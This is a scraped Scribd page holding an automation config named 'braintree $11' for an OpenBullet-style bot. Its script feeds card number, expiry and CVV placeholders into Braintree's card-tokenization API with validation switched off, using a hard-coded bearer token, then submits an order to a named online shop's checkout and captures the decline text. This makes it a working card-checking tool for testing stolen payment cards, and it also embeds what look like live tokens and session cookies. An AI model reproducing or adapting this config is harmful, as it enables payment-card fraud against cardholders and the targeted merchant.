Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
481 views3 pages

Braintree $11

The document contains settings and scripts for an automated bot. The settings section defines various configuration options for the bot like the name, suggested number of bots, plugins, and colors. The script section contains functions for translating years and making requests - one to tokenize a credit card on the Braintree API and another to process an order on a checkout page.

Uploaded by

paypaltrex
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
481 views3 pages

Braintree $11

The document contains settings and scripts for an automated bot. The settings section defines various configuration options for the bot like the name, suggested number of bots, plugins, and colors. The script section contains functions for translating years and making requests - one to tokenize a credit card on the Braintree API and another to process an order on a checkout page.

Uploaded by

paypaltrex
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

[SETTINGS]

{
"Name": "braintree $11",
"SuggestedBots": 1,
"MaxCPM": 0,
"LastModified": "2023-03-21T21:38:32.170512+05:00",
"AdditionalInfo": "",
"RequiredPlugins": [],
"Author": "",
"Version": "1.1.2 [SB]",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"IsBase64": false,
"FilterList": [],
"EvaluateMathOCR": false,
"SecurityProtocol": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"AcceptInsecureCertificates": true,
"DisableNotifications": false,
"DisableImageLoading": false,
"DefaultProfileDirectory": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": "",
"Title": "braintree $11",
"IconPath": "Icon\\svbfile.ico",
"LicenseSource": null,
"Message": null,
"MessageColor": "#FFFFFFFF",
"HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
"AuthorColor": "#FFFFB266",
"WordlistColor": "#FFB5C2E1",
"BotsColor": "#FFA8FFFF",
"CustomInputColor": "#FFD6C7C7",
"CPMColor": "#FFFFFFFF",
"ProgressColor": "#FFAD93E3",
"HitsColor": "#FF66FF66",
"CustomColor": "#FFFFB266",
"ToCheckColor": "#FF7FFFD4",
"FailsColor": "#FFFF3333",
"RetriesColor": "#FFFFFF99",
"OcrRateColor": "#FF4698FD",
"ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Translate
KEY "23" VALUE "2023"
KEY "24" VALUE "2024"
KEY "25" VALUE "2025"
KEY "26" VALUE "2026"
KEY "27" VALUE "2027"
KEY "28" VALUE "2028"
KEY "29" VALUE "2029"
KEY "30" VALUE "2030"
KEY "31" VALUE "2031"
"<ano>" -> VAR "ano1"

#token REQUEST POST "https://payments.braintree-api.com/graphql"


CONTENT "{\"clientSdkMetadata\":
{\"source\":\"client\",\"integration\":\"dropin2\",\"sessionId\":\"0c40a3fe-f77c-
4688-bdc4-1f718d38cbfc\"},\"query\":\"mutation TokenizeCreditCard($input:
TokenizeCreditCardInput!) { tokenizeCreditCard(input: $input) { token
creditCard { bin brandCode last4 cardholderName
expirationMonth expirationYear binData { prepaid
healthcare debit durbinRegulated commercial payroll
issuingBank countryOfIssuance
productId } } } }\",\"variables\":{\"input\":{\"creditCard\":
{\"number\":\"<cc>\",\"expirationMonth\":\"<mes>\",\"expirationYear\":\"<ano>\",\"c
vv\":\"<cvv>\"},\"options\":
{\"validate\":false}}},\"operationName\":\"TokenizeCreditCard\"}"
CONTENTTYPE "application/json"
HEADER ": scheme: https"
HEADER "accept: */*"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "authorization: Bearer
eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjIwMTgwNDI2MTYtcHJvZHVjdGlvbiIsImlzcyI
6Imh0dHBzOi8vYXBpLmJyYWludHJlZWdhdGV3YXkuY29tIn0.eyJleHAiOjE2Nzk1MDI0NjUsImp0aSI6Ij
cxNDE1MjY3LWRmOTYtNGI5Mi05MjA0LTY4ZGQ2NDFhYTRiYiIsInN1YiI6IjR3Y2JudnF5enlna2R4aDkiL
CJpc3MiOiJodHRwczovL2FwaS5icmFpbnRyZWVnYXRld2F5LmNvbSIsIm1lcmNoYW50Ijp7InB1YmxpY19p
ZCI6IjR3Y2JudnF5enlna2R4aDkiLCJ2ZXJpZnlfY2FyZF9ieV9kZWZhdWx0IjpmYWxzZX0sInJpZ2h0cyI
6WyJtYW5hZ2VfdmF1bHQiXSwic2NvcGUiOlsiQnJhaW50cmVlOlZhdWx0Il0sIm9wdGlvbnMiOnt9fQ.Gdd
EEKQH9yKAtpuaVShpkRDwBs6V5oE7rSdGu426K2CML0CCzU1DXzzKLR05mTY_56QKmR-
e2inRXEVvkzu8Zw"
HEADER "braintree-version: 2018-05-10"
HEADER "content-length: 755"
HEADER "content-type: application/json"
HEADER "origin: https://assets.braintreegateway.com"
HEADER "referer: https://assets.braintreegateway.com/"
HEADER "sec-ch-ua: \"Google
Chrome\";v=\"111\", \"Not(A:Brand\";v=\"8\", \"Chromium\";v=\"111\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-fetch-dest: empty"
HEADER "sec-fetch-mode: cors"
HEADER "sec-fetch-site: cross-site"
HEADER "sec-gpc: 1"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
PARSE "<SOURCE>" JSON "token" -> VAR "token"

PARSE "<SOURCE>" JSON "requestId" -> VAR "requestId"

#process.php REQUEST POST "https://fcsp-shop.us/checkout/order/process.php"


CONTENT
"nonce=<token>&ship_fname=james&ship_lname=smith&ship_street=123123+ase&ship_street
2=&ship_city=NY&ship_state=40&ship_postal=11223&ship_country=205&phone=7049991111&t
axid=&email=dickmail%40duck.com&email_confirm=dickmail%40duck.com&bill-
same=yes&fname=&lname=&street=&street2=&city=&state=61&postal=&country=&ShippingTyp
eID=usps_media_mail&notes=&privacy=on&device_data=%7B%22device_session_id%22%3A
%22bcfcf7ebdbd52cf381ea2eeee6712d34%22%2C%22fraud_merchant_id%22%3Anull%2C
%22correlation_id%22%3A%224b35d5af37f73f699bafe3974a0622e2%22%7D"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9"
HEADER "Cache-Control: max-age=0"
HEADER "Connection: keep-alive"
HEADER "Content-Length: 571"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "Cookie: PHPSESSID=sl9itiu970lkk3jbs0ri31lu8l; KRM=StoreID%3D243;
krm_artist_identifier=fc-st-pauli; Store_Session=SessionID
%3D61F77FE4F50CE00F1A9CE6330317AAAA; kingsroad=StateID%3D40%26CountryID
%3D205%26PostalCode%3D11223; countryAccessModal=shown"
HEADER "Host: fcsp-shop.us"
HEADER "Origin: https://fcsp-shop.us"
HEADER "Referer: https://fcsp-shop.us/checkout/order/"
HEADER "sec-ch-ua: \"Google
Chrome\";v=\"111\", \"Not(A:Brand\";v=\"8\", \"Chromium\";v=\"111\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Sec-Fetch-Dest: document"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-User: ?1"
HEADER "sec-gpc: 1"
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"

PARSE "<SOURCE>" LR ">Please try again, something went wrong " "<"
CreateEmpty=FALSE -> CAP "result"

You might also like